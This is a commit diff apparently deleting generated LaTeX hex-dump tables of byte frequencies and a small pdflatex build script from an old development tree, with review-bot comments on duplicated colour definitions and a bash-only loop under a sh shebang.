\definecolor{Hexy118}{rgb}{0.462,0,0.537}
\definecolor{Hexy135}{rgb}{0.529,0,0.470}
\definecolor{Hexy106}{rgb}{0.415,0,0.584}
\definecolor{Hexy107}{rgb}{0.419,0,0.580}
\definecolor{Hexy114}{rgb}{0.447,0,0.552}
\definecolor{Hexy106}{rgb}{0.415,0,0.584}
\definecolor{Hexy104}{rgb}{0.407,0,0.592}
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
\definecolor{Hexy102}{rgb}{0.4,0,0.6}
\definecolor{Hexy119}{rgb}{0.466,0,0.533}
\definecolor{Hexy111}{rgb}{0.435,0,0.564}
\definecolor{Hexy109}{rgb}{0.427,0,0.572}
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
\definecolor{Hexy108}{rgb}{0.423,0,0.576}
\definecolor{Hexy119}{rgb}{0.466,0,0.533}
\definecolor{Hexy112}{rgb}{0.439,0,0.560}
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
\definecolor{Hexy88}{rgb}{0.345,0,0.654}
\definecolor{Hexy114}{rgb}{0.447,0,0.552}
\definecolor{Hexy106}{rgb}{0.415,0,0.584}
\definecolor{Hexy103}{rgb}{0.403,0,0.596}
\definecolor{Hexy113}{rgb}{0.443,0,0.556}
\definecolor{Hexy112}{rgb}{0.439,0,0.560}
\definecolor{Hexy123}{rgb}{0.482,0,0.517}
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
\definecolor{Hexy118}{rgb}{0.462,0,0.537}
\definecolor{Hexy124}{rgb}{0.486,0,0.513}
\definecolor{Hexy112}{rgb}{0.439,0,0.560}
\definecolor{Hexy124}{rgb}{0.486,0,0.513}
\definecolor{Hexy107}{rgb}{0.419,0,0.580}
\definecolor{Hexy120}{rgb}{0.470,0,0.529}
\definecolor{Hexy110}{rgb}{0.431,0,0.568}
\definecolor{Hexy86}{rgb}{0.337,0,0.662}
\definecolor{Hexy100}{rgb}{0.392,0,0.607}
\definecolor{Hexy113}{rgb}{0.443,0,0.556}
\definecolor{Hexy137}{rgb}{0.537,0,0.462}
\definecolor{Hexy108}{rgb}{0.423,0,0.576}
\definecolor{Hexy120}{rgb}{0.470,0,0.529}
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
\definecolor{Hexy114}{rgb}{0.447,0,0.552}
\definecolor{Hexy223}{rgb}{0.874,0,0.125}
\definecolor{Hexy122}{rgb}{0.478,0,0.521}
\definecolor{Hexy121}{rgb}{0.474,0,0.525}
\definecolor{Hexy86}{rgb}{0.337,0,0.662}
\definecolor{Hexy130}{rgb}{0.509,0,0.490}
\definecolor{Hexy118}{rgb}{0.462,0,0.537}
\definecolor{Hexy119}{rgb}{0.466,0,0.533}
\definecolor{Hexy124}{rgb}{0.486,0,0.513}
\definecolor{Hexy113}{rgb}{0.443,0,0.556}
\definecolor{Hexy127}{rgb}{0.498,0,0.501}
\definecolor{Hexy105}{rgb}{0.411,0,0.588}
\definecolor{Hexy0}{rgb}{0,0,0}
\definecolor{HexyGreen}{rgb}{0,.7,0}
{\footnotesize
\begin{semiverbatim}
total: 6000
uniq: 52
\color{HexyGreen}\color{HexyGreen} 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f
\color{HexyGreen}00 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}10 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}20 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy110}6e \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy118}76
\color{HexyGreen}30 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy135}87 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy106}6a
\color{HexyGreen}40 \color{Hexy107}6b \color{Hexy114}72 \color{Hexy106}6a \color{Hexy104}68 \color{Hexy116}74 \color{Hexy102}66 \color{Hexy119}77 \color{Hexy111}6f \color{Hexy109}6d \color{Hexy116}74 \color{Hexy108}6c \color{Hexy119}77 \color{Hexy112}70 \color{Hexy116}74 \color{Hexy88}58 \color{Hexy114}72
\color{HexyGreen}50 \color{Hexy106}6a \color{Hexy103}67 \color{Hexy113}71 \color{Hexy112}70 \color{Hexy123}7b \color{Hexy116}74 \color{Hexy118}76 \color{Hexy124}7c \color{Hexy112}70 \color{Hexy124}7c \color{Hexy107}6b \color{Hexy120}78 \color{Hexy0}00 \color{Hexy110}6e \color{Hexy86}56 \color{Hexy100}64
\color{HexyGreen}60 \color{Hexy113}71 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}70 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}80 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}90 \color{Hexy0}00 \color{Hexy137}89 \color{Hexy108}6c \color{Hexy120}78 \color{Hexy0}00 \color{Hexy116}74 \color{Hexy114}72 \color{Hexy223}df \color{Hexy122}7a \color{Hexy121}79 \color{Hexy0}00 \color{Hexy86}56 \color{Hexy130}82 \color{Hexy0}00 \color{Hexy118}76 \color{Hexy119}77
\color{HexyGreen}a0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}b0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}c0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}d0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}e0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}f0 \color{Hexy0}00 00 00 00 00 \color{Hexy124}7c \color{Hexy0}00 00 \color{Hexy113}71 \color{Hexy127}7f \color{Hexy0}00 00 \color{Hexy105}69 \color{Hexy0}00 00 00
\end{semiverbatim}
}
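Review bot: the colour preamble of this generated hex dump defines the same colour name repeatedly (Hexy106 appears three times, Hexy116 five times, and so on), and the header row issues `\color{HexyGreen}` twice in a row; xcolor tolerates redefinition, but every include of this file re-runs fifty-odd `\definecolor` calls for about a dozen distinct colours. Since the file is deleted here with the rest of the old dev tree that is moot, but if the generator behind these dumps is kept it should emit each `\definecolor` once (collect the names into a set before printing) and emit the green header colour a single time. The same pattern recurs in the other three hex-dump files removed in this commit.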


@ -1,77 +0,0 @@
\definecolor{Hexy100}{rgb}{0.392,0,0.607}
\definecolor{Hexy111}{rgb}{0.435,0,0.564}
\definecolor{Hexy120}{rgb}{0.470,0,0.529}
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
\definecolor{Hexy127}{rgb}{0.498,0,0.501}
\definecolor{Hexy107}{rgb}{0.419,0,0.580}
\definecolor{Hexy111}{rgb}{0.435,0,0.564}
\definecolor{Hexy123}{rgb}{0.482,0,0.517}
\definecolor{Hexy121}{rgb}{0.474,0,0.525}
\definecolor{Hexy114}{rgb}{0.447,0,0.552}
\definecolor{Hexy117}{rgb}{0.458,0,0.541}
\definecolor{Hexy115}{rgb}{0.450,0,0.549}
\definecolor{Hexy118}{rgb}{0.462,0,0.537}
\definecolor{Hexy88}{rgb}{0.345,0,0.654}
\definecolor{Hexy111}{rgb}{0.435,0,0.564}
\definecolor{Hexy122}{rgb}{0.478,0,0.521}
\definecolor{Hexy108}{rgb}{0.423,0,0.576}
\definecolor{Hexy120}{rgb}{0.470,0,0.529}
\definecolor{Hexy122}{rgb}{0.478,0,0.521}
\definecolor{Hexy126}{rgb}{0.494,0,0.505}
\definecolor{Hexy113}{rgb}{0.443,0,0.556}
\definecolor{Hexy109}{rgb}{0.427,0,0.572}
\definecolor{Hexy101}{rgb}{0.396,0,0.603}
\definecolor{Hexy117}{rgb}{0.458,0,0.541}
\definecolor{Hexy127}{rgb}{0.498,0,0.501}
\definecolor{Hexy114}{rgb}{0.447,0,0.552}
\definecolor{Hexy123}{rgb}{0.482,0,0.517}
\definecolor{Hexy114}{rgb}{0.447,0,0.552}
\definecolor{Hexy113}{rgb}{0.443,0,0.556}
\definecolor{Hexy119}{rgb}{0.466,0,0.533}
\definecolor{Hexy109}{rgb}{0.427,0,0.572}
\definecolor{Hexy100}{rgb}{0.392,0,0.607}
\definecolor{Hexy113}{rgb}{0.443,0,0.556}
\definecolor{Hexy124}{rgb}{0.486,0,0.513}
\definecolor{Hexy100}{rgb}{0.392,0,0.607}
\definecolor{Hexy115}{rgb}{0.450,0,0.549}
\definecolor{Hexy107}{rgb}{0.419,0,0.580}
\definecolor{Hexy121}{rgb}{0.474,0,0.525}
\definecolor{Hexy135}{rgb}{0.529,0,0.470}
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
\definecolor{Hexy116}{rgb}{0.454,0,0.545}
\definecolor{Hexy232}{rgb}{0.909,0,0.090}
\definecolor{Hexy107}{rgb}{0.419,0,0.580}
\definecolor{Hexy104}{rgb}{0.407,0,0.592}
\definecolor{Hexy118}{rgb}{0.462,0,0.537}
\definecolor{Hexy91}{rgb}{0.356,0,0.643}
\definecolor{Hexy109}{rgb}{0.427,0,0.572}
\definecolor{Hexy114}{rgb}{0.447,0,0.552}
\definecolor{Hexy117}{rgb}{0.458,0,0.541}
\definecolor{Hexy87}{rgb}{0.341,0,0.658}
\definecolor{Hexy107}{rgb}{0.419,0,0.580}
\definecolor{Hexy111}{rgb}{0.435,0,0.564}
\definecolor{Hexy0}{rgb}{0,0,0}
\definecolor{HexyGreen}{rgb}{0,.7,0}
{\footnotesize
\begin{semiverbatim}
total: 6000
uniq: 52
\color{HexyGreen}\color{HexyGreen} 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f
\color{HexyGreen}00 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}10 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}20 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy100}64 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy111}6f
\color{HexyGreen}30 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy120}78 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy116}74
\color{HexyGreen}40 \color{Hexy127}7f \color{Hexy107}6b \color{Hexy111}6f \color{Hexy123}7b \color{Hexy121}79 \color{Hexy114}72 \color{Hexy117}75 \color{Hexy115}73 \color{Hexy118}76 \color{Hexy88}58 \color{Hexy111}6f \color{Hexy122}7a \color{Hexy108}6c \color{Hexy120}78 \color{Hexy122}7a \color{Hexy126}7e
\color{HexyGreen}50 \color{Hexy113}71 \color{Hexy109}6d \color{Hexy101}65 \color{Hexy117}75 \color{Hexy127}7f \color{Hexy114}72 \color{Hexy123}7b \color{Hexy114}72 \color{Hexy113}71 \color{Hexy119}77 \color{Hexy109}6d \color{Hexy100}64 \color{Hexy0}00 \color{Hexy113}71 \color{Hexy124}7c \color{Hexy100}64
\color{HexyGreen}60 \color{Hexy115}73 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}70 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}80 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}90 \color{Hexy0}00 \color{Hexy107}6b \color{Hexy121}79 \color{Hexy135}87 \color{Hexy0}00 \color{Hexy116}74 74 \color{Hexy232}e8 \color{Hexy107}6b \color{Hexy104}68 \color{Hexy0}00 \color{Hexy118}76 \color{Hexy91}5b \color{Hexy0}00 \color{Hexy109}6d \color{Hexy114}72
\color{HexyGreen}a0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}b0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}c0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}d0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}e0 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}f0 \color{Hexy0}00 00 00 00 00 \color{Hexy117}75 \color{Hexy0}00 00 \color{Hexy87}57 \color{Hexy107}6b \color{Hexy0}00 00 \color{Hexy111}6f \color{Hexy0}00 00 00
\end{semiverbatim}
}


@ -1,4 +0,0 @@
#!/bin/sh
for((i = 0; i < 2; i++)); do
pdflatex csw05
done
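Review bot: `for((i = 0; i < 2; i++)); do` is a bash arithmetic loop, not POSIX sh, so under the `#!/bin/sh` shebang this script fails wherever /bin/sh is dash or another strict shell. The file goes away with this commit, but a revived version should either use `#!/bin/bash` or a portable form such as `pdflatex csw05 && pdflatex csw05`, which has the added benefit of stopping on the first failed run instead of blindly running the second pass.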

File diff suppressed because it is too large


@ -1,166 +0,0 @@
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy0}{rgb}{0,0,0}
\definecolor{HexyGreen}{rgb}{0,.7,0}
{\footnotesize
\begin{semiverbatim}
total: 6000
uniq: 141
\color{HexyGreen}\color{HexyGreen} 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f
\color{HexyGreen}00 \color{Hexy0}00 \color{Hexy18}12 12 12 \color{Hexy57}39 39 \color{Hexy0}00 00 \color{Hexy18}12 \color{Hexy17}11 11 11 \color{Hexy57}39 39 \color{Hexy0}00 00
\color{HexyGreen}10 \color{Hexy18}12 12 12 \color{Hexy17}11 \color{Hexy57}39 39 \color{Hexy0}00 00 \color{Hexy18}12 12 12 12 \color{Hexy57}39 39 \color{Hexy0}00 00
\color{HexyGreen}20 \color{Hexy18}12 \color{Hexy17}11 \color{Hexy18}12 12 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39 \color{Hexy18}12 12 \color{Hexy17}11 \color{Hexy18}12 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39
\color{HexyGreen}30 \color{Hexy17}11 11 \color{Hexy18}12 12 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39 \color{Hexy17}11 11 \color{Hexy18}12 \color{Hexy17}11 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy57}39
\color{HexyGreen}40 \color{Hexy57}39 39 39 \color{Hexy58}3a \color{Hexy0}00 00 \color{Hexy57}39 39 39 39 39 39 \color{Hexy0}00 00 \color{Hexy57}39 \color{Hexy58}3a
\color{HexyGreen}50 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}60 \color{Hexy0}00 00 00 00 00 00 \color{Hexy57}39 39 \color{Hexy0}00 \color{Hexy18}12 \color{Hexy0}00 \color{Hexy17}11 \color{Hexy0}00 00 00 00
\color{HexyGreen}70 \color{Hexy58}3a \color{Hexy57}39 39 39 39 39 39 39 39 39 39 39 \color{Hexy58}3a \color{Hexy57}39 39 39
\color{HexyGreen}80 \color{Hexy18}12 12 \color{Hexy0}00 \color{Hexy18}12 12 \color{Hexy17}11 11 \color{Hexy18}12 12 12 \color{Hexy0}00 00 00 00 00 00
\color{HexyGreen}90 \color{Hexy57}39 39 39 \color{Hexy58}3a \color{Hexy0}00 00 \color{Hexy57}39 39 39 39 \color{Hexy0}00 \color{Hexy57}39 \color{Hexy0}00 00 00 \color{Hexy57}39
\color{HexyGreen}a0 \color{Hexy0}00 00 00 00 00 00 00 00 \color{Hexy58}3a \color{Hexy57}39 \color{Hexy0}00 00 00 00 00 00
\color{HexyGreen}b0 \color{Hexy58}3a \color{Hexy57}39 39 39 39 \color{Hexy58}3a \color{Hexy57}39 39 39 39 39 39 \color{Hexy0}00 00 \color{Hexy58}3a \color{Hexy57}39
\color{HexyGreen}c0 \color{Hexy18}12 12 \color{Hexy0}00 00 00 00 00 00 00 00 00 00 00 00 00 00
\color{HexyGreen}d0 \color{Hexy18}12 12 12 \color{Hexy17}11 \color{Hexy57}39 39 39 \color{Hexy0}00 00 00 00 00 00 00 00 00
\color{HexyGreen}e0 \color{Hexy57}39 39 39 39 \color{Hexy0}00 00 00 00 00 00 00 \color{Hexy57}39 \color{Hexy0}00 00 00 00
\color{HexyGreen}f0 \color{Hexy0}00 00 00 00 00 \color{Hexy57}39 \color{Hexy17}11 11 \color{Hexy58}3a \color{Hexy57}39 \color{Hexy0}00 00 \color{Hexy57}39 39 \color{Hexy17}11 11
\end{semiverbatim}
}


@ -1,166 +0,0 @@
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy58}{rgb}{0.227,0,0.772}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy57}{rgb}{0.223,0,0.776}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
\definecolor{Hexy17}{rgb}{0.066,0,0.933}
\definecolor{Hexy18}{rgb}{0.070,0,0.929}
